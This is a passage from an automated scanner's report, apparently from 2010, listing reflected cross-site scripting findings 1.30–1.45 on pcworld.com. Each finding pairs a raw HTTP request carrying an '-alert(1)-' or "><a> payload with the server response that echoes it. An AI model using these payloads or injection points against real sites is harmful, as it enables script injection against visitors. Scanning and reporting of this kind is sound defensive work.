   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/8c125'-alert(1)-'39c55748519/geek_tech.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.30. http://www.pcworld.com/blogs/id,62/geek_tech.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,62/geek_tech.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 192cb'-alert(1)-'416bb20e1a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,62/geek_tech.html192cb'-alert(1)-'416bb20e1a4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:26 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,62/geek_tech.html192cb'-alert(1)-'416bb20e1a4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.31. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,66/linux_line.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55265'-alert(1)-'a109872e66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/55265'-alert(1)-'a109872e66c/linux_line.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:58:07 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:07 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/55265'-alert(1)-'a109872e66c/linux_line.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie =
...[SNIP]...

1.32. http://www.pcworld.com/blogs/id,66/linux_line.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,66/linux_line.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 292dc'-alert(1)-'b3698f2a39f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,66/linux_line.html292dc'-alert(1)-'b3698f2a39f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5D3AD06A566ABDB7C2D25706D4AF4DBC; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:09 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,66/linux_line.html292dc'-alert(1)-'b3698f2a39f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.33. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,67/net_work.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0710'-alert(1)-'9db33a76e8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/b0710'-alert(1)-'9db33a76e8a/net_work.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:53 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=BA202F1EEDF7CDA0884F7F7F75E3CAB9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:53 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/b0710'-alert(1)-'9db33a76e8a/net_work.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "
...[SNIP]...

1.34. http://www.pcworld.com/blogs/id,67/net_work.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,67/net_work.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64209'-alert(1)-'6234fb55e46 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,67/net_work.html64209'-alert(1)-'6234fb55e46 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:54 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
n.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,67/net_work.html64209'-alert(1)-'6234fb55e46';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.35. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,71/daily_deals.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca74d'-alert(1)-'bf8ab6cf1ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/ca74d'-alert(1)-'bf8ab6cf1ae/daily_deals.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:57:13 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=0E631C64C7861AE504E40679905DE9F5; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:13 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/ca74d'-alert(1)-'bf8ab6cf1ae/daily_deals.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie
...[SNIP]...

1.36. http://www.pcworld.com/blogs/id,71/daily_deals.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,71/daily_deals.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b862a'-alert(1)-'c96530a122c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,71/daily_deals.htmlb862a'-alert(1)-'c96530a122c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:57:16 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,71/daily_deals.htmlb862a'-alert(1)-'c96530a122c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.37. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,72/pcworld_podcast.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dab9f'-alert(1)-'5b78173d8a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/dab9f'-alert(1)-'5b78173d8a9/pcworld_podcast.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:55:31 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=1A4D5A5DCB1970567ED325C1BAFA0E9D; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:31 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ew Object();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/dab9f'-alert(1)-'5b78173d8a9/pcworld_podcast.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.coo
...[SNIP]...

1.38. http://www.pcworld.com/blogs/id,72/pcworld_podcast.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /blogs/id,72/pcworld_podcast.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8c9e5'-alert(1)-'660e752b332 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs/id,72/pcworld_podcast.html8c9e5'-alert(1)-'660e752b332 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:55:32 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
mail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/blogs/id,72/pcworld_podcast.html8c9e5'-alert(1)-'660e752b332';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.39. http://www.pcworld.com/browse.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /browse.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb040'-alert(1)-'99cad240f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /browse.htmleb040'-alert(1)-'99cad240f98 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:58:57 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ject();
   Logon.userEmail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/browse.htmleb040'-alert(1)-'99cad240f98';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.40. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77490"><a>de8bb9d55a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html77490"><a>de8bb9d55a2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=BC0737F0D5559464E12C7F92A01EE089; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:18 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
e;blg=network;pg=article;aid=210556;c=1730;c=1731;c=1733;c=1732;c=1735;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html77490"><a>de8bb9d55a2"/>
...[SNIP]...

1.41. http://www.pcworld.com/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4bd8'-alert(1)-'a6b9bd474b4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.htmla4bd8'-alert(1)-'a6b9bd474b4 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:46:27 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
lid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/article/210556/facebook_email_is_the_missing_piece_of_the_puzzle.htmla4bd8'-alert(1)-'a6b9bd474b4';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.42. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c6c8"><a>125b6148f7c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/cell_phones_voip4c6c8"><a>125b6148f7c/cell_phones.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:40:51 GMT
Cache-Control: max-age=60
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:40:51 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
img style="display:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/cell_phones_voip4c6c8"><a>125b6148f7c/cell_phones.html"/>
...[SNIP]...

1.43. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24593'-alert(1)-'3f83e2d88cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/cell_phones_voip24593'-alert(1)-'3f83e2d88cd/cell_phones.html HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 22:41:50 GMT
Cache-Control: max-age=60
Set-Cookie: JSESSIONID=8E78B875A1ED908DA94325CC670D1D4E; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:41:49 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
mail = pcw_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/businesscenter/index/cell_phones_voip24593'-alert(1)-'3f83e2d88cd/cell_phones.html';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "p
...[SNIP]...

1.44. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac10b"><a>a7c172bf8c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /businesscenter/index/cell_phones_voip/cell_phones.htmlac10b"><a>a7c172bf8c7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=099C52BBFCE40E15EF0CA7647F08B590; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:42:43 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
y:none" width="1" height="1" src="http://pixel.pcworld.com/pixel.gif?ad=pcw.bc/index;pg=index;c=1730;pos=336showcase;tile=2;sz=336x280;
&amp;url=/businesscenter/index/cell_phones_voip/cell_phones.htmlac10b"><a>a7c172bf8c7"/>
...[SNIP]...

1.45. http://www.pcworld.com/businesscenter/index/cell_phones_voip/cell_phones.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /businesscenter/index/cell_phones_voip/cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 37b5e'-alert(1)-'91a3468e022 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /businesscenter/index/cell_phones_voip/cell_phones.html37b5e'-alert(1)-'91a3468e022 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:44:03 GMT
